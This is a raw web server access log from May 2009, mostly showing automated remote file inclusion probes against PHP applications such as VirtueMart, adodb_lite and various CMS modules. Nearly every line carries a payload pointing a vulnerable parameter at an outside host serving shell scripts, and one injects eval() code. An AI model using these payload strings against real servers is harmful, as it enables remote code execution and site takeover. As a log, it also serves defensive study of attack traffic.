218.249.36.194 - - [14/May/2009:23:25:56 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:23:26:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:23:26:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:26:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:26:40 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
218.249.36.194 - - [14/May/2009:23:27:52 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:23:27:52 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:23:27:52 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:23:27:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:23:29:06 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:23:29:06 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:23:29:06 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:23:29:57 -0500] "GET /logs/access_log.1137801600 HTTP/1.1" 200 1471 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:23:30:47 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:30:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
72.52.230.168 - - [14/May/2009:23:31:18 -0500] "GET /logs/access_log.1230249600//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:23:33:50 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:23:33:50 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:23:34:39 -0500] "GET /logs/access_log.1172966400 HTTP/1.1" 200 2691 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:23:34:42 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:34:42 -0500] "GET /logs/errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:34:42 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:34:42 -0500] "GET /errors.php?error=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.58.119.65 - - [14/May/2009:23:34:50 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:34:50 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:34:50 -0500] "GET /logs/access_log.1238371200//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:34:54 -0500] "GET /logs/access_log.1238889600//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1238284800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1236211200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1239148800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1236470400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1239494400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1238976000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1238025600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1237507200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1236297600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1235865600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1237420800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1236556800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:02 -0500] "GET /logs/access_log.1235952000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:37:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:37:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:37:04 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:07 -0500] "GET /logs/access_log.1239926400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:37:18 -0500] "GET /logs/access_log.1238198400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:38:23 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:38:23 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:38:23 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:23:39:21 -0500] "GET /logs/access_log.1189555200 HTTP/1.1" 200 6311 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.218 - - [14/May/2009:23:40:41 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.218 - - [14/May/2009:23:41:30 -0500] "GET /logs/access_log.1133136000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:23:42:05 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:23:42:05 -0500] "GET /logs/access_log.1147651200 HTTP/1.1" 200 962 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
194.126.110.134 - - [14/May/2009:23:43:43 -0500] "GET /logs/access_log.1235606400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
194.126.110.134 - - [14/May/2009:23:43:43 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
194.126.110.134 - - [14/May/2009:23:43:43 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
194.126.110.134 - - [14/May/2009:23:43:57 -0500] "GET /logs/access_log.1237766400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:23:44:02 -0500] "GET /logs/access_log.1171411200 HTTP/1.1" 200 6477 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [14/May/2009:23:45:21 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:45:21 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:45:21 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:45:30 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:45:30 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:45:31 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:46:03 -0500] "GET /logs/access_log.1237852800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:23:46:04 -0500] "GET /logs/access_log.1237852800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:23:48:25 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:48:25 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:23:48:44 -0500] "GET /logs/access_log.1116288000 HTTP/1.1" 200 1121 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.172.92.14 - - [14/May/2009:23:49:13 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:23:49:14 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
87.106.135.14 - - [14/May/2009:23:50:26 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:23:50:26 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
213.186.113.5 - - [14/May/2009:23:51:48 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:23:51:48 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.249.67.180 - - [14/May/2009:23:53:26 -0500] "GET /logs/access_log.1170201600 HTTP/1.1" 200 141341 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.239.150.144 - - [14/May/2009:23:53:45 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.limss.com/bbs/lims/CMD.txt%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
211.239.150.144 - - [14/May/2009:23:53:45 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.limss.com/bbs/lims/CMD.txt%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
211.239.150.144 - - [14/May/2009:23:53:45 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.limss.com/bbs/lims/CMD.txt%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:23:53:49 -0500] "GET /logs/db.php?path_local=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:23:53:49 -0500] "GET /db.php?path_local=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 289 "-""libwww-perl/5.79"
65.55.106.244 - - [14/May/2009:23:53:59 -0500] "GET /logs/access_log.1131667200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [14/May/2009:23:55:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [14/May/2009:23:55:31 -0500] "GET /logs/access_log.1199577600 HTTP/1.1" 200 732 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.135.14 - - [14/May/2009:23:57:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:23:57:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.135.148.59 - - [14/May/2009:23:57:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://212.227.74.68/catalog/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
195.135.148.59 - - [14/May/2009:23:57:38 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://212.227.74.68/catalog/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
66.249.67.180 - - [14/May/2009:23:58:08 -0500] "GET /logs/access_log.1145059200 HTTP/1.1" 200 5646 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.2 - - [14/May/2009:23:58:22 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:23:58:22 -0500] "GET /logs/access_log.1239580800//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:23:58:22 -0500] "GET /logs/access_log.1238112000//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:23:58:22 -0500] "GET //ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:23:58:39 -0500] "GET /logs/access_log.1239667200//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:23:58:39 -0500] "GET /logs/access_log.1239926400//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.52.164.18 - - [14/May/2009:23:58:46 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.52.164.18 - - [14/May/2009:23:58:46 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
212.59.11.66 - - [14/May/2009:23:59:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:59:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [15/May/2009:00:00:00 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.172.92.14 - - [15/May/2009:00:00:07 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [15/May/2009:00:00:08 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
65.55.106.236 - - [15/May/2009:00:00:31 -0500] "GET /logs/access_log.1127260800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.164.18 - - [15/May/2009:00:00:37 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.52.164.18 - - [15/May/2009:00:00:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
213.186.113.5 - - [15/May/2009:00:01:11 -0500] "GET /logs/avatar.php?page=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
213.186.113.5 - - [15/May/2009:00:01:11 -0500] "GET /avatar.php?page=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.137.160.90 - - [15/May/2009:00:01:45 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:01:45 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:01:45 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:01:51 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
